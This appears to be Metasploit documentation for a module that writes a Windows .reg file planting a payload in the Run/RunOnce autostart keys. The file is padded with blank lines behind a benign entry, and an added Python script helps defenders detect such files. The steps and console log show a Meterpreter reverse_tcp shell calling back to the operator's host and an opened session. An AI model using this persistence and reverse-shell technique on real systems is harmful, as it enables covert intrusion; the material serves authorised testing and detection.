## Vulnerable Application

This module creates a Windows Registration Entries (.reg) file which adds the specified payload to the Windows Registry. The payload runs upon Windows login for the current user. If the user has elevated privileges when opening the file, the payload will also run upon login for any user who logs in.

The user will receive a warning prompt asking them to confirm the Registry changes when opening the file.

This module has been tested successfully on:

- Microsoft Windows 7 Professional SP1 (x86_64)
- Microsoft Windows 11 Professional 21H2 (x86_64)
## Options

**FILENAME**

The registration entries file name. (Default: msf.reg)

## Advanced Options

**AddToCurrentUserWindowsCurrentVersionRun**

Add payload to login for the current user. (Default: true)

**AddToCurrentUserWindowsCurrentVersionRunOnce**

Same as AddToCurrentUserWindowsCurrentVersionRun, but the registry key is deleted after use. (Default: false)

**AddToLocalMachineWindowsCurrentVersionRun**

Add payload to login for all users. The user will see a vague error message if they do not have the necessary permissions, but all other entries are still added successfully. (Default: true)

**AddToLocalMachineWindowsCurrentVersionRunOnce**

Same as AddToLocalMachineWindowsCurrentVersionRun, but the registry key is deleted after use. (Default: false)

**PrependBenignEntry**

Prepend a benign registry entry at the start of the file. (Default: true)

**PrependNewLines**

Prepend new lines before the first malicious registry entry. (Default: 100)
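As an added example for defenders (this is not part of the module or its documentation), the Python script below parses a .reg file and reports every value written under the `CurrentVersion\Run` and `RunOnce` autostart keys that the options above target. It also measures the largest run of blank lines, since the PrependNewLines option pads the file so the autostart entries sit far below the benign first key. The embedded sample file is constructed for this example with placeholder command strings; `parse_reg`, `find_autoruns` and `max_blank_run` are names chosen here, not module APIs.

```python
import re

# Constructed sample: a benign first key, 100 blank lines of padding, then
# Run and RunOnce entries. Commands are placeholders, not real payloads.
SAMPLE_REG = (
    "Windows Registry Editor Version 5.00\r\n"
    "\r\n"
    "[HKEY_CURRENT_USER\\Software\\ExampleVendor\\ExampleApp]\r\n"
    "\"Installed\"=\"1\"\r\n"
    + "\r\n" * 100
    + "[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]\r\n"
    "\"Updater\"=\"cmd.exe /c PLACEHOLDER_COMMAND\"\r\n"
    "\r\n"
    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce]\r\n"
    "\"Setup\"=\"C:\\\\Users\\\\Public\\\\PLACEHOLDER.exe\"\r\n"
)

# Autostart locations of interest: ...\CurrentVersion\Run, RunOnce, RunOnceEx
AUTORUN_KEY_RE = re.compile(
    r"\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)(Ex)?$", re.IGNORECASE
)


def decode_reg(data):
    """Accept bytes or str; regedit exports are UTF-16LE with a BOM."""
    if isinstance(data, str):
        return data
    if data.startswith(b"\xff\xfe"):
        return data.decode("utf-16")
    if data.startswith(b"\xef\xbb\xbf"):
        return data.decode("utf-8-sig")
    return data.decode("utf-8", errors="replace")


def parse_reg(text):
    """Return [(key_path, [(value_name, raw_value), ...]), ...] in file order."""
    entries = []
    current = None
    pending_name, pending = None, ""  # hex values continued with trailing '\'
    for raw in decode_reg(text).splitlines():
        line = raw.strip()
        if pending_name is not None:
            pending += line.rstrip("\\")
            if not line.endswith("\\"):
                current[1].append((pending_name, pending))
                pending_name, pending = None, ""
            continue
        if not line or line.startswith(";"):
            continue  # blank padding or comment
        if line.startswith("[") and line.endswith("]"):
            current = (line[1:-1], [])  # "[-KEY]" marks a deletion; kept as-is
            entries.append(current)
            continue
        if current is None:
            continue  # file header before the first key
        name, sep, value = line.partition("=")
        if not sep:
            continue
        name = "@" if name == "@" else name.strip('"')
        if value.endswith("\\"):
            pending_name, pending = name, value.rstrip("\\")
            continue
        current[1].append((name, value))
    return entries


def decode_string(raw):
    """Unescape a quoted REG_SZ value; leave hex:/dword: data untouched."""
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return re.sub(r'\\(["\\])', r"\1", raw[1:-1])
    return raw


def find_autoruns(text):
    """List (key, value_name, decoded_value) for autostart entries."""
    hits = []
    for key, values in parse_reg(text):
        if AUTORUN_KEY_RE.search(key):
            for name, raw in values:
                hits.append((key, name, decode_string(raw)))
    return hits


def max_blank_run(text):
    """Longest run of consecutive blank lines (padding is a triage signal)."""
    longest = run = 0
    for line in decode_reg(text).splitlines():
        run = run + 1 if not line.strip() else 0
        longest = max(longest, run)
    return longest


if __name__ == "__main__":
    print("keys:", len(parse_reg(SAMPLE_REG)), "max blank run:", max_blank_run(SAMPLE_REG))
    for key, name, value in find_autoruns(SAMPLE_REG):
        print(f"AUTORUN {key}\\{name} = {value}")
```

Pointing the script at a real file (`find_autoruns(open(path, "rb").read())`) is enough to triage an unsolicited .reg attachment before anyone double-clicks it; a file whose only autostart values sit after dozens of blank lines matches the layout this module produces.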
## Verification Steps

On the Metasploit host:

- Start msfconsole
- Do: `use exploit/windows/fileformat/windows_registration_entries`
- Do: `set filename [filename.reg]`
- Do: `set payload [payload]`
- Do: `set lhost [lhost]`
- Do: `set lport [lport]`
- Do: `run`
- Do: `handler -p [payload] -P [lport] -H [lhost]`

On the target Windows machine:

- Ensure Windows Security is disabled
- Open the `msf.reg` file and click `Yes` for the "Are you sure you want to continue?" prompt
- Log out, then log in as the same user
## Scenarios

### Microsoft Windows 11 Professional 21H2 (x86_64)

```
msf6 > use exploit/windows/fileformat/windows_registration_entries
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/windows_registration_entries) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/windows_registration_entries) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf6 exploit(windows/fileformat/windows_registration_entries) > set lport 4444
lport => 4444
msf6 exploit(windows/fileformat/windows_registration_entries) > run
[+] msf.reg stored at /root/.msf4/local/msf.reg
[*] This file will create the following registry keys:
HKEY_CURRENT_USER\Software\JpWpgNXlLXXrQv\Kz8Qi33Zow
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\2iL9aN40YYLwgDl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rhFG8l9yvhQ
msf6 exploit(windows/fileformat/windows_registration_entries) > handler -p cmd/windows/http/x64/meterpreter/reverse_tcp -P 4444 -H 192.168.200.130
[*] Payload handler running as background job 0.
msf6 exploit(windows/fileformat/windows_registration_entries) >
[*] Started reverse TCP handler on 192.168.200.130:4444
msf6 exploit(windows/fileformat/windows_registration_entries) >
[*] Sending stage (203846 bytes) to 192.168.200.169
[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.169:59250) at 2025-07-13 08:42:07 -0400
msf6 exploit(windows/fileformat/windows_registration_entries) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: win-11-pro-x64\asdf
meterpreter > sysinfo
Computer        : WIN-11-PRO-X64
OS              : Windows 11 21H2 (10.0 Build 22000).
Architecture    : x64
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 5
Meterpreter     : x64/windows
```